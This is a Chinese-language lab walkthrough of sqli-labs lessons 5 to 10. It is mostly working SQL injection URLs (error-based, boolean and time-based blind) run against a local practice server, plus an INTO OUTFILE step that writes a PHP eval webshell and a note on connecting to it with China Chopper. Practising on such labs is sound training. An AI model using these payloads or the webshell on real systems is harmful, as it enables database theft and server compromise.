Less-5
-
键入正确的url
http://192.168.12.129:81/sqli-labs/Less-5/?id=1 # You are in........... # 不显示结果
-
尝试注入类型
http://192.168.12.129:81/sqli-labs/Less-5/?id=1' # You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 # 可以确定为是字符型注入,通过单引号闭合
-
使用报错注入
http://192.168.12.129:81/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+ # XPATH syntax error: '~security~'
-
爆库、爆表、爆字段
http://192.168.12.129:81/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,50),0x7e),1)--+ http://192.168.12.129:81/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,50),0x7e),1)--+
Less-6
-
键入正确的url
http://192.168.12.129:81/sqli-labs/Less-6/?id=1 # You are in........... # 不显示结果
-
尝试注入类型
http://192.168.12.129:81/sqli-labs/Less-5/?id=1' # You are in........... http://192.168.12.129:81/sqli-labs/Less-6/?id=1" # You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 # 可以确定为是字符型注入,通过双引号闭合
-
使用报错注入
http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1)--+ # 或 http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and extractvalue(1,concat(0x7e,database(),0x7e)) --+ # XPATH syntax error: '~security~'
-
爆库、爆表、爆字段
http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,50),0x7e),1)--+ http://192.168.12.129:81/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,50),0x7e),1)--+
Less-7
-
键入正确的url
http://192.168.12.129:81/sqli-labs/Less-7/?id=1 # You are in.... Use outfile...... # 不显示结果,提示使用outfile
-
尝试注入类型
http://192.168.12.129:81/sqli-labs/Less-7/?id=1' # You have an error in your SQL syntax http://192.168.12.129:81/sqli-labs/Less-7/?id=1' --+ # You have an error in your SQL syntax http://192.168.12.129:81/sqli-labs/Less-7/?id=1') --+ # You have an error in your SQL syntax http://192.168.12.129:81/sqli-labs/Less-7/?id=1')) --+ # You are in.... Use outfile...... # 可以确定为是字符型注入,通过'))闭合
-
使用outfile,编写木马
http://192.168.12.129:81/sqli-labs/Less-7/?id=1')) union select 1,2,'0x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e' into outfile "/opt/lampp/htdocs/whm.php"--+ # You have an error in your SQL syntax
-
使用中国菜刀
-
添加url
-
成功
-
Less-8
-
键入正确的url
http://192.168.12.129:81/sqli-labs/Less-8/?id=1 # You are in...........
-
尝试注入类型
http://192.168.12.129:81/sqli-labs/Less-8/?id=1' # 没有显示 http://192.168.12.129:81/sqli-labs/Less-8/?id=1" # You are in........... http://192.168.12.129:81/sqli-labs/Less-8/?id=1' --+ # You are in........... # 可以确定为是字符型注入,通过'闭合
-
尝试时间型盲注
http://192.168.12.129:81/sqli-labs/Less-8/?id=1' and if(length(database())=8,sleep(3),1)--+ # 页面加载大概3秒左右显示 # 可以判断数据库名字长度为8
-
使用布尔型盲注爆破出数据库名
http://192.168.12.129:81/sqli-labs/Less-8/?id=1' and substr(database(),1,1)='s' --+ # 可使用脚本实现,爆破出数据库名 # 爆破出可以得到数据库名为: security
Less-9
-
键入正确的url
http://192.168.12.129:81/sqli-labs/Less-9/?id=1 # You are in...........
-
尝试注入类型
http://192.168.12.129:81/sqli-labs/Less-9/?id=1' http://192.168.12.129:81/sqli-labs/Less-9/?id=1" http://192.168.12.129:81/sqli-labs/Less-9/?id=1') http://192.168.12.129:81/sqli-labs/Less-9/?id=1") http://192.168.12.129:81/sqli-labs/Less-9/?id=1 and 1=2 http://192.168.12.129:81/sqli-labs/Less-9/?id=-1 # You are in........... # 难搞 http://192.168.12.129:81/sqli-labs/Less-9/?id=1 and sleep(3) # 依旧 # You are in........... http://192.168.12.129:81/sqli-labs/Less-9/?id=1' and sleep(3)--+ # 页面加载大概3秒左右显示 # 建议使用脚本爆破,确定'闭合
-
时间型盲注
http://192.168.12.129:81/sqli-labs/Less-9/?id=1' and if(length(database())=8,sleep(3),1)--+ # 页面加载大概3秒左右显示 # 可以判断数据库名字长度为8 http://192.168.12.129:81/sqli-labs/Less-9/?id=1' and if(substr(database(),1,1)='s',sleep(3),1)--+ # 可使用脚本实现,爆破出数据库名 # 爆破出可以得到数据库名为: security
Less-10
-
键入正确的url
http://192.168.12.129:81/sqli-labs/Less-10/?id=1 # You are in...........
-
尝试注入类型
http://192.168.12.129:81/sqli-labs/Less-10/?id=1" and sleep(3)--+ # 页面加载大概3秒左右显示 # 害,不多说,和Less-9一样,建议使用脚本爆破,确定"闭合
-
尝试时间型盲注
http://192.168.12.129:81/sqli-labs/Less-10/?id=1" and if(length(database())=8,sleep(3),1)--+ # 页面加载大概3秒左右显示 # 可以判断数据库名字长度为8 http://192.168.12.129:81/sqli-labs/Less-10/?id=1" and if(substr(database(),1,1)='s',sleep(3),1)--+ # 可使用脚本实现,爆破出数据库名 # 爆破出可以得到数据库名为: security